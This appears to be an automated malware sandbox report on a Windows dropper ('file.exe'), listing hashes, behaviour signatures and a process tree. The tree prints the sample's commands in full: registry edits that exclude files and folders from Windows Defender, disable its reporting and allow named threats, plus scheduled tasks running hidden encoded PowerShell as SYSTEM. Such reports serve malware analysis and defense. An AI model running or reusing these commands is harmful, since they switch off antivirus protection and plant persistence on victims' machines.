Analysis

  • max time kernel
    107s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-10-2022 19:50

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    a35dbba262db9ae584fbdec0e6323cac

  • SHA1

    9d62d9517e1e6542a9f57bcd10dcea0eaf10723d

  • SHA256

    87f63e1fac30814b0d9fe2137da82c3aafc2c29e217596d47dca5addd6e0ecd7

  • SHA512

    22d31687685d0995c2b5bb1f4a196dceba3e4ef3c3d274179504ec99d70fb8c2646664d8b080b4e26abde4180fa12ee4ee966988f8f0a78965e41789f8c2f53f

  • SSDEEP

    196608:91OjAn0WZazjJgyd5FL9355pry0FTqIW8semyMdOzO1kh:3OnW0nJv95/pe0vfgtE

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Users\Admin\AppData\Local\Temp\7zS91E4.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Users\Admin\AppData\Local\Temp\7zS94A3.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4976
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1680
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3684
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:832
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4568
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3548
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:2832
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gYaQRUNBr" /SC once /ST 07:52:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1816
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gYaQRUNBr"
                  4⤵
                    PID:3808
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gYaQRUNBr"
                    4⤵
                      PID:2660
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bNmmFmDfYxkEbHwDyL" /SC once /ST 21:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\NJQcesl.exe\" 5L /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3320
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2580
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3528
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2332
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:2460
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:4548
                      • C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\NJQcesl.exe
                        C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\NJQcesl.exe 5L /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:2084
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4956
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2620
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4144
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:2976
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:1272
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:740
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:3952
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:3576
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2068
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:3688
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4360
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4944
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:548
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:3268
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:5036
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:3784
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3428
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3680
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2688
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4948
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:2832
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:1824
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:1648
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:808
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:1080
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:1068
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZbDVoFOXNENU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZbDVoFOXNENU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oEaTcchOPpGVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oEaTcchOPpGVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sVKkdmDjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sVKkdmDjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uGQUxmMVndUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uGQUxmMVndUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qZroPUUiMzyEdOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qZroPUUiMzyEdOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rxGmlNEdrxIyNebK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rxGmlNEdrxIyNebK\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3172
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:1688
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2568
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1872
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:4652
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:3656
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:2312
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:2580
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4600
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1520
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:1088
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4252
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qZroPUUiMzyEdOVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:4908
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qZroPUUiMzyEdOVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4940
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4408
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1940
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rxGmlNEdrxIyNebK /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:1944
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rxGmlNEdrxIyNebK /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1852
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gDYtZghSU" /SC once /ST 13:52:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:680
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gDYtZghSU"
